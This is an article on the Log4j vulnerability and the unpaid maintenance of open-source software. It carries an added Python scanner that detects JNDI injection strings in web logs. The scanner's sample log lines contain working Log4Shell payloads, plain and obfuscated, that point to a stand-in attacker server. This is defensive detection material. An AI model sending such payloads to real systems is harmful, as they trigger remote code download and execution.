Accessible to everyone?

Software today is built largely on publicly available programs whose source code anyone can inspect. That has real benefits, but the latest vulnerability should serve as a warning.

The past weekend was a nightmare for software developers all over the world: after a vulnerability so severe "that even six-year-olds can exploit it" became known, the Federal Office for Information Security (BSI) declared its highest warning level. Numerous programs used in very different areas are affected, from Minecraft and Cisco systems to Apple iCloud and Amazon Web Services. Now the whole world is asking: how could this happen?

In fact, Apache's Log4j, the program causing the problems, looks fairly harmless at first glance. It is a so-called logger, a library whose only job is to record which activities take place in a piece of software. Loggers are needed partly for legal reasons, to prove how a particular application was used, but also to track down errors. Now, however, it has turned out that Log4j has a serious security vulnerability. It allows an attacker to smuggle program code onto a computer on which the logger is running and to execute it there, unnoticed: a specially crafted string that ends up in a log message is enough to make the logger fetch and run code from a server the attacker controls. With that, an attacker can, for example, steal data or mine cryptocurrencies with someone else's computing power.
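As an added illustration (not part of the original article, and not code from the Log4j project), the following Python snippet scans web-server log lines for the kind of string that triggers this vulnerability. Log4j 2 resolved `${jndi:...}` lookups embedded in logged text, and attackers commonly hide the keyword behind nested lookups such as `${lower:j}` or `${::-j}`, so the scanner first flattens those before matching. The log lines, the paths and the 203.0.113.x addresses are constructed for the example.

```python
import re

# Innermost ${...} lookup: a body containing no further "$", "{" or "}".
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# What we look for once nesting has been flattened: ${jndi:<protocol>:...}
JNDI = re.compile(r"\$\{\s*jndi:\s*([a-z]+):", re.IGNORECASE)


def _resolve(body):
    """Evaluate one innermost lookup the way attackers use them to hide
    the keyword; return None for anything we do not want to flatten."""
    low = body.lower()
    if low.startswith("lower:"):
        return body[len("lower:"):].lower()
    if low.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        # ${env:UNDEFINED:-j} or ${::-j}: the lookup's only effect is its default value
        return body.split(":-", 1)[1]
    return None


def normalize(text, max_rounds=20):
    """Repeatedly replace innermost obfuscation lookups until nothing changes.
    Unknown lookups (including ${jndi:...} itself) are left in place."""
    for _ in range(max_rounds):
        changed = False

        def replace(match):
            nonlocal changed
            resolved = _resolve(match.group(1))
            if resolved is None:
                return match.group(0)
            changed = True
            return resolved

        text = INNERMOST.sub(replace, text)
        if not changed:
            break
    return text


def scan(lines):
    """Return one finding per line that carries a JNDI lookup after flattening."""
    findings = []
    for number, line in enumerate(lines, start=1):
        flat = normalize(line)
        match = JNDI.search(flat)
        if match:
            findings.append({"line": number,
                             "protocol": match.group(1).lower(),
                             "normalized": flat})
    return findings


# Constructed access-log lines; the User-Agent field is attacker-controlled input
# that an application would typically hand to its logger unchanged.
LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:14 +0000] "GET /login HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:15 +0000] "GET /x HTTP/1.1" 404 0 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.7:1099/b}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:16 +0000] "GET /x HTTP/1.1" 404 0 "-" "${${env:NaN:-j}ndi:dns://203.0.113.7/c}"',
    '10.0.0.12 - - [10/Dec/2021:14:02:20 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 12 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:14:02:22 +0000] "GET / HTTP/1.1" 200 512 "-" "${jNdI:${upper:l}dap://203.0.113.7:1389/a}"',
]

if __name__ == "__main__":
    for finding in scan(LOG_LINES):
        print(f"line {finding['line']}: jndi via {finding['protocol']} -> {finding['normalized']}")
```

Line 6 shows why the flattening matters: not every `${...}` in a log is an attack, so the scanner flags only strings that still resolve to a JNDI lookup, rather than alerting on every dollar-brace.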

The extent of the threat is so great because Log4j is enormously widespread and is used in a huge variety of applications. This is because it is open source software (OSS for short), meaning that the source code is freely accessible and can be used by anyone free of charge. In fact, a large part of today's IT infrastructure is based on OSS, which generally proves to be considerably more secure than commercial alternatives. For example, while the source code of the freely available operating system Linux contains an average of 0.17 errors per 1,000 lines of code, commercial systems have between 20 and 30, as "Wired" reported back in 2004. This is not surprising: if program code is publicly available, many people can check it, which makes it possible to eliminate more errors. Whether anyone actually does so, however, is another matter.

A thankless job

So what went wrong with Log4j? This question has been circulating on the internet since last weekend. An xkcd comic quickly made the rounds that sums up the problem in a single picture: it shows a complicated, wobbly structure made up of numerous individual blocks. This represents »all modern digital infrastructure«. But the whole structure rests on one tiny component, "a project some random person in Nebraska has been thanklessly maintaining since 2003." That is more or less the story of Log4j and of many other open source projects that developers maintain in their spare time.

While computer scientists employed at companies often earn six-figure annual salaries, people who work on open source projects are financed by donations. In fact, Ralph Goers, who maintained Log4j in his free time (alongside a full-time job), until recently had only three sponsors on the software platform »GitHub«. Volkan Yazıcı, who also works on Log4j, complained on Twitter: "We have been working continuously on mitigation measures ... But nothing stops people from bashing us for work we are not even paid for ..."

Unfortunately, the problem is not new. As early as 2014, the so-called Heartbleed vulnerability drew attention to the need to rethink how we deal with open source software, and to reward its developers financially. It is also alarming that many companies apparently use these programs without ever examining them in detail.

The end of open source?

Despite the catastrophic extent of the Log4j vulnerability, experts do not see this as a failure of open source software. Admittedly, the free availability of the source code also has disadvantages in a case like this: according to a tweet by the CEO of the internet security company »Cloudflare«, at times more than 400 attacks per second were directed at the Log4j vulnerability. In the meantime, however, a revised version of the program has been released in which the loophole is closed. That only helps where the new version is actually installed: because Log4j is embedded in countless other products, each of those must be updated in turn.

In fact, freely available source code offers many advantages that go far beyond the financial. Besides greater security, free access makes the programs much more flexible and diverse: developers can, for example, write extensions from which others also benefit. As a result, the software is not tied to the fixed structures laid down by a single company, but can enable numerous uses that may not have been foreseen at first. In addition, OSS projects increasingly focus on making their programs compatible with as many systems as possible.

These are just a few of the many reasons why the use of OSS is unlikely to decline in the future. Its developers hope, however, that their work will receive more recognition in the future, including financially.
